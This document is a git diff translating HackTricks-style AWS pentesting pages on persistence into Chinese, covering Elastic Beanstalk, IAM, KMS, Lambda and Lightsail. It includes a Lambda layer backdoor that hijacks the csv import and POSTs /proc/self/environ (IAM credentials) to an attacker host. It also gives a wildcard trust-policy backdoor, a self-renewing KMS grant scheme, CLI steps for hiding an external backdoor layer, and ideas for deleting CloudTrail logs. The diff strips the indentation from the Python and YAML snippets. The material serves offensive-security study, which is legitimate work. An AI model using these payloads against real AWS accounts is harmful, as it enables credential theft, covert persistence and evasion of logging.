+为了在 AWS 账户中保持持久性,可以在实例内部引入一些 **持久性机制**(cron 作业,ssh 密钥...),以便攻击者能够访问并从元数据服务中窃取 IAM 角色 **凭证**。
-### Backdoor in Version
+### 版本中的后门
-An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
+攻击者可以在 S3 仓库中植入后门代码,以便它始终执行其后门和预期代码。
-### New backdoored version
+### 新的植入后门版本
-Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
+攻击者可以部署一个新的植入后门的应用程序版本,而不是更改实际版本中的代码。
-### Abusing Custom Resource Lifecycle Hooks
+### 滥用自定义资源生命周期钩子
> [!NOTE]
-> TODO: Test
-
-Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
+> TODO: 测试
+Elastic Beanstalk 提供生命周期钩子,允许您在实例配置和终止期间运行自定义脚本。攻击者可以 **配置生命周期钩子以定期执行一个脚本,提取数据或保持对 AWS 账户的访问**。
```bash
bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
- AWSEBAutoScalingGroup:
- Metadata:
- AWS::ElasticBeanstalk::Ext:
- TriggerConfiguration:
- triggers:
- - name: stealthy-lifecycle-hook
- events:
- - "autoscaling:EC2_INSTANCE_LAUNCH"
- - "autoscaling:EC2_INSTANCE_TERMINATE"
- target:
- ref: "AWS::ElasticBeanstalk::Environment"
- arn:
- Fn::GetAtt:
- - "AWS::ElasticBeanstalk::Environment"
- - "Arn"
- stealthyLifecycleHook:
- Type: AWS::AutoScaling::LifecycleHook
- Properties:
- AutoScalingGroupName:
- Ref: AWSEBAutoScalingGroup
- LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
- NotificationTargetARN:
- Ref: stealthy-lifecycle-hook
- RoleARN:
- Fn::GetAtt:
- - AWSEBAutoScalingGroup
- - Arn' > stealthy_lifecycle_hook.yaml
+AWSEBAutoScalingGroup:
+Metadata:
+AWS::ElasticBeanstalk::Ext:
+TriggerConfiguration:
+triggers:
+- name: stealthy-lifecycle-hook
+events:
+- "autoscaling:EC2_INSTANCE_LAUNCH"
+- "autoscaling:EC2_INSTANCE_TERMINATE"
+target:
+ref: "AWS::ElasticBeanstalk::Environment"
+arn:
+Fn::GetAtt:
+- "AWS::ElasticBeanstalk::Environment"
+- "Arn"
+stealthyLifecycleHook:
+Type: AWS::AutoScaling::LifecycleHook
+Properties:
+AutoScalingGroupName:
+Ref: AWSEBAutoScalingGroup
+LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
+NotificationTargetARN:
+Ref: stealthy-lifecycle-hook
+RoleARN:
+Fn::GetAtt:
+- AWSEBAutoScalingGroup
+- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
index e3e1944e7..dbd67c1a0 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
@@ -1,53 +1,47 @@
-# AWS - IAM Persistence
+# AWS - IAM 持久性
{{#include ../../../banners/hacktricks-training.md}}
## IAM
-For more information access:
+有关更多信息,请访问:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
-### Common IAM Persistence
+### 常见的 IAM 持久性
-- Create a user
-- Add a controlled user to a privileged group
-- Create access keys (of the new user or of all users)
-- Grant extra permissions to controlled users/groups (attached policies or inline policies)
-- Disable MFA / Add you own MFA device
-- Create a Role Chain Juggling situation (more on this below in STS persistence)
+- 创建用户
+- 将受控用户添加到特权组
+- 创建访问密钥(新用户或所有用户的访问密钥)
+- 授予受控用户/组额外权限(附加策略或内联策略)
+- 禁用 MFA / 添加您自己的 MFA 设备
+- 创建角色链 juggling 情况(有关更多信息,请参见下面的 STS 持久性)
-### Backdoor Role Trust Policies
-
-You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
+### 后门角色信任策略
+您可以后门信任策略,以便能够假设它用于由您控制的外部资源(或对所有人):
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": ["*", "arn:aws:iam::123213123123:root"]
- },
- "Action": "sts:AssumeRole"
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": ["*", "arn:aws:iam::123213123123:root"]
+},
+"Action": "sts:AssumeRole"
+}
+]
}
```
+### 后门策略版本
-### Backdoor Policy Version
+将管理员权限授予一个不是最后版本的策略(最后版本应该看起来合法),然后将该版本的策略分配给一个受控用户/组。
-Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
+### 后门 / 创建身份提供者
-### Backdoor / Create Identity Provider
-
-If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
+如果账户已经信任一个常见的身份提供者(如Github),则可以增加信任的条件,以便攻击者可以利用它们。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
index 7aefbd410..b8bdf0792 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
@@ -1,43 +1,37 @@
-# AWS - KMS Persistence
+# AWS - KMS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## KMS
-For mor information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
-### Grant acces via KMS policies
+### 通过 KMS 策略授予访问权限
-An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
+攻击者可以使用权限 **`kms:PutKeyPolicy`** 来 **授予访问** 一个密钥给他控制的用户或甚至是一个外部账户。有关更多信息,请查看 [**KMS 权限提升页面**](../aws-privilege-escalation/aws-kms-privesc.md)。
-### Eternal Grant
+### 永久授权
-Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
+授权是另一种方式,可以让主体对特定密钥拥有一些权限。可以授予一个授权,允许用户创建授权。此外,用户可以对同一个密钥拥有多个授权(甚至是相同的)。
-Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
-
-(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
+因此,用户可以拥有 10 个具有所有权限的授权。攻击者应该不断监控这一点。如果在某个时刻 1 个授权被移除,应该生成另外 10 个授权。
+(我们使用 10 而不是 2,以便能够检测到一个授权被移除,而用户仍然拥有一些授权)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
- --key-id \
- --grantee-principal \
- --operations "CreateGrant" "Decrypt"
+--key-id \
+--grantee-principal \
+--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id
```
-
> [!NOTE]
-> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+> 授予只能从此处授予权限: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
index 1390c2d55..d2b82e30b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -4,7 +4,7 @@
## Lambda
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../../aws-services/aws-lambda-enum.md
@@ -12,7 +12,7 @@ For more information check:
### Lambda Layer Persistence
-It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
+可以**引入/后门一个层以在隐秘的方式下执行任意代码**,当lambda被执行时:
{{#ref}}
aws-lambda-layers-persistence.md
@@ -20,49 +20,45 @@ aws-lambda-layers-persistence.md
### Lambda Extension Persistence
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+利用Lambda Layers,也可以利用扩展并在lambda中持久化,同时窃取和修改请求。
{{#ref}}
aws-abusing-lambda-extensions.md
{{#endref}}
-### Via resource policies
+### 通过资源策略
-It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
+可以授予外部账户对不同lambda操作(如调用或更新代码)的访问权限:
-### Versions, Aliases & Weights
+### 版本、别名和权重
-A Lambda can have **different versions** (with different code each version).\
-Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
-This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
+一个Lambda可以有**不同的版本**(每个版本有不同的代码)。\
+然后,您可以创建**不同版本的不同别名**并为每个设置不同的权重。\
+这样,攻击者可以创建一个**后门版本1**和一个**仅包含合法代码的版本2**,并**仅在1%的请求中执行版本1**以保持隐秘。
-### Version Backdoor + API Gateway
+### 版本后门 + API Gateway
-1. Copy the original code of the Lambda
-2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
- 1. Call the API gateway related to the lambda to execute the code
-3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
- 1. This will hide the backdoored code in a previous version
-4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1`
- 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
-5. Select the POST method created and in Actions select **`Deploy API`**
-6. Now, when you **call the function via POST your Backdoor** will be invoked
+1. 复制Lambda的原始代码
+2. **创建一个新的版本,后门化**原始代码(或仅包含恶意代码)。发布并**将该版本部署**到$LATEST
+1. 调用与lambda相关的API网关以执行代码
+3. **创建一个包含原始代码的新版本**,发布并将该**版本**部署到$LATEST。
+1. 这将隐藏之前版本中的后门代码
+4. 转到API Gateway并**创建一个新的POST方法**(或选择任何其他方法),该方法将执行lambda的后门版本:`arn:aws:lambda:us-east-1::function::1`
+1. 注意arn的最后部分:1 **指示函数的版本**(在此场景中,版本1将是后门版本)。
+5. 选择创建的POST方法,在操作中选择**`部署API`**
+6. 现在,当您**通过POST调用函数时,您的后门**将被调用
### Cron/Event actuator
-The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
-Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
+您可以使**lambda函数在某些事件发生或经过一段时间后运行**,这使得lambda成为获得持久性和避免检测的良好且常见的方法。\
+在这里,您有一些想法,可以通过创建lambdas使您的**AWS存在更加隐秘**。
-- Every time a new user is created lambda generates a new user key and send it to the attacker.
-- Every time a new role is created lambda gives assume role permissions to compromised users.
-- Every time new cloudtrail logs are generated, delete/alter them
+- 每当创建新用户时,lambda生成一个新用户密钥并将其发送给攻击者。
+- 每当创建新角色时,lambda授予被攻陷用户假设角色的权限。
+- 每当生成新的cloudtrail日志时,删除/更改它们。
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
index 71655ada0..5bcb6d4df 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -1,46 +1,42 @@
-# AWS - Abusing Lambda Extensions
+# AWS - 滥用 Lambda 扩展
{{#include ../../../../banners/hacktricks-training.md}}
-## Lambda Extensions
+## Lambda 扩展
-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+Lambda 扩展通过与各种 **监控、可观察性、安全和治理工具** 集成来增强功能。这些扩展通过 [.zip 压缩包使用 Lambda 层](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署中](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/),以两种模式运行:**内部** 和 **外部**。
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** 和 **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 和 11、Node.js 10 和 12,以及 .NET Core 3.1**。
+- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作对齐。它们与多种运行时兼容,如 **Node.js 10 和 12、Python 3.7 和 3.8、Ruby 2.5 和 2.7、Java Corretto 8 和 11、.NET Core 3.1** 以及 **自定义运行时**。
-For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
+有关 [**Lambda 扩展如何工作的更多信息,请查看文档**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html)。
-### External Extension for Persistence, Stealing Requests & modifying Requests
+### 持久性、窃取请求和修改请求的外部扩展
-This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+这是本文中提出的技术摘要:[https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
-It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.**
+发现 Lambda 运行环境中的默认 Linux 内核是使用 “**process_vm_readv**” 和 “**process_vm_writev**” 系统调用编译的。所有进程都以相同的用户 ID 运行,即使是为外部扩展创建的新进程。**这意味着外部扩展可以完全读写 Rapid 的堆内存,这是设计使然。**
-Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
+此外,虽然 Lambda 扩展有能力 **订阅调用事件**,但 AWS 不会向这些扩展透露原始数据。这确保了 **扩展无法访问通过 HTTP 请求传输的敏感信息**。
-The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
+Init (Rapid) 进程在 [http://127.0.0.1:9001](http://127.0.0.1:9001/) 监控所有 API 请求,而 Lambda 扩展在执行任何运行时代码之前初始化并运行,但在 Rapid 之后。
-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
+变量 **`AWS_LAMBDA_RUNTIME_API`** 指示 **IP** 地址和 **端口** 号,以便 **子运行时进程** 和其他扩展使用。
> [!WARNING]
-> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
+> 通过将 **`AWS_LAMBDA_RUNTIME_API`** 环境变量更改为我们可以访问的 **`port`**,可以拦截 Lambda 运行时内的所有操作(**中间人攻击**)。这是可能的,因为扩展与 Rapid Init 具有相同的权限,并且系统内核允许 **修改进程内存**,从而能够更改端口号。
-Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
+因为 **扩展在任何运行时代码之前运行**,修改环境变量将影响运行时进程(例如,Python、Java、Node、Ruby)在启动时的行为。此外,**在我们之后加载的扩展**,依赖于此变量,也将通过我们的扩展进行路由。此设置可能使恶意软件完全绕过安全措施或直接在运行时环境中记录扩展。
-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
+工具 [**lambda-spy**](https://github.com/clearvector/lambda-spy) 被创建用于执行 **内存写入** 和 **窃取敏感信息**,从 lambda 请求、其他 **扩展** **请求** 甚至 **修改它们**。
-## References
+## 参考文献
- [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
index f8a5e2868..af5a1d01b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -4,79 +4,72 @@
## Lambda Layers
-A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+Lambda 层是一个 .zip 文件归档,**可以包含额外的代码**或其他内容。一个层可以包含库、[自定义运行时](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html)、数据或配置文件。
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+每个函数最多可以包含 **五个层**。当你在一个函数中包含一个层时,**内容会被提取到执行环境中的 `/opt`** 目录。
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+**默认情况下**,你创建的 **层** 对你的 AWS 账户是 **私有** 的。你可以选择 **与其他账户共享** 一个层或 **将** 该层 **公开**。如果你的函数使用了其他账户发布的层,即使该层被删除或你被撤销访问权限,你的函数仍然可以 **继续使用该层版本**。但是,你不能使用已删除的层版本创建新函数或更新函数。
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+作为容器镜像部署的函数不使用层。相反,当你构建镜像时,你将所需的运行时、库和其他依赖项打包到容器镜像中。
### Python load path
-The load path that Python will use in lambda is the following:
-
+Python 在 lambda 中使用的加载路径如下:
```
['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
```
-
-Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
+检查 **第二** 和 **第三** **位置** 是否被 **lambda layers** 解压其文件的目录占用: **`/opt/python/lib/python3.9/site-packages`** 和 **`/opt/python`**
> [!CAUTION]
-> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation.
+> 如果攻击者设法 **后门** 一个被使用的 lambda **layer** 或 **添加一个** 在加载常用库时会 **执行任意代码** 的层,他将能够在每次 lambda 调用时执行恶意代码。
-Therefore, the requisites are:
+因此,要求是:
-- **Check libraries** that are **loaded** by the victims code
-- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library.
+- **检查库** 这些库是 **被受害者代码加载的**
+- 创建一个 **带有 lambda layers 的代理库**,该库将 **执行自定义代码** 并 **加载原始** 库。
-### Preloaded libraries
+### 预加载的库
> [!WARNING]
-> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\
-> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
-
-With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
+> 在滥用此技术时,我发现了一个困难:一些库在你的代码执行时已经在 python 运行时中 **被加载**。我原本期待找到像 `os` 或 `sys` 这样的东西,但 **甚至 `json` 库也被加载**。\
+> 为了滥用这种持久性技术,代码需要 **加载一个在代码执行时未加载的新库**。
+使用这样的 python 代码,可以获得 **在 lambda 中预加载的库列表**:
```python
import sys
def lambda_handler(event, context):
- return {
- 'statusCode': 200,
- 'body': str(sys.modules.keys())
- }
+return {
+'statusCode': 200,
+'body': str(sys.modules.keys())
+}
```
-
-And this is the **list** (check that libraries like `os` or `json` are already there)
-
+这是**列表**(检查像`os`或`json`这样的库是否已经存在)
```
'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
```
+这是**lambda 默认包含的库**列表:[https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
-And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+### Lambda Layer 后门
-### Lambda Layer Backdooring
+在这个例子中,假设目标代码正在导入 **`csv`**。我们将对 **`csv` 库的导入进行后门处理**。
-In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
+为此,我们将创建目录 **csv**,并在其中放置文件 **`__init__.py`**,路径为 lambda 加载的路径:**`/opt/python/lib/python3.9/site-packages`**\
+然后,当 lambda 执行并尝试加载 **csv** 时,我们的 **`__init__.py` 文件将被加载并执行**。\
+该文件必须:
-For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
-Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
-This file must:
-
-- Execute our payload
-- Load the original csv library
-
-We can do both with:
+- 执行我们的有效载荷
+- 加载原始的 csv 库
+我们可以通过以下方式同时完成这两项:
```python
import sys
from urllib import request
with open("/proc/self/environ", "rb") as file:
- url= "https://attacker13123344.com/" #Change this to your server
- req = request.Request(url, data=file.read(), method="POST")
- response = request.urlopen(req)
+url= "https://attacker13123344.com/" #Change this to your server
+req = request.Request(url, data=file.read(), method="POST")
+response = request.urlopen(req)
# Remove backdoor directory from path to load original library
del_path_dir = "/".join(__file__.split("/")[:-2])
@@ -90,29 +83,27 @@ import csv as _csv
sys.modules["csv"] = _csv
```
+然后,创建一个 zip 文件,包含此代码,路径为 **`python/lib/python3.9/site-packages/__init__.py`**,并将其添加为 lambda 层。
-Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
+您可以在 [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) 找到此代码。
-You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-
-The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
+集成的有效载荷将在 **首次调用或在 lambda 容器重置后**(代码更改或冷 lambda)**发送 IAM 凭证到服务器**,但 **其他技术**(如以下内容)也可以集成:
{{#ref}}
../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
{{#endref}}
-### External Layers
+### 外部层
-Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
-Also note that the **max number of layers a lambda can have is 5**.
+请注意,可以使用 **来自外部账户的 lambda 层**。此外,即使没有权限,lambda 也可以使用来自外部账户的层。\
+还要注意,**一个 lambda 最多可以有 5 个层**。
-Therefore, in order to improve the versatility of this technique an attacker could:
-
-- Backdoor an existing layer of the user (nothing is external)
-- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
- - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
- - The victim **won't see external layers** used with **`aws lambda list-layers`**
+因此,为了提高此技术的灵活性,攻击者可以:
+- 在用户的现有层中植入后门(没有任何外部内容)
+- **在他的账户中创建**一个**层**,给予**受害者账户使用**该层的权限,**配置**受害者的 Lambda 中的**层**并**移除权限**。
+- **Lambda** 仍然能够**使用该层**,而**受害者**将没有任何简单的方法来**下载层代码**(除了在 lambda 内部获取反向 shell)
+- 受害者**不会看到**使用 **`aws lambda list-layers`** 的外部层
```bash
# Upload backdoor layer
aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
@@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
# Remove permissions
aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
```
-
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
index 88b0d082a..03372a14f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -4,34 +4,30 @@
## Lightsail
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-lightsail-enum.md
{{#endref}}
-### Download Instance SSH keys & DB passwords
+### 下载实例 SSH 密钥和数据库密码
-They won't be changed probably so just having them is a good option for persistence
+它们可能不会被更改,因此拥有它们是持久性的一个好选择
-### Backdoor Instances
+### 后门实例
-An attacker could get access to the instances and backdoor them:
+攻击者可以访问实例并对其进行后门操作:
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key**
-- Expose a port with port knocking with a backdoor
+- 例如使用传统的 **rootkit**
+- 添加新的 **公共 SSH 密钥**
+- 使用后门暴露一个端口并进行端口敲击
-### DNS persistence
+### DNS 持久性
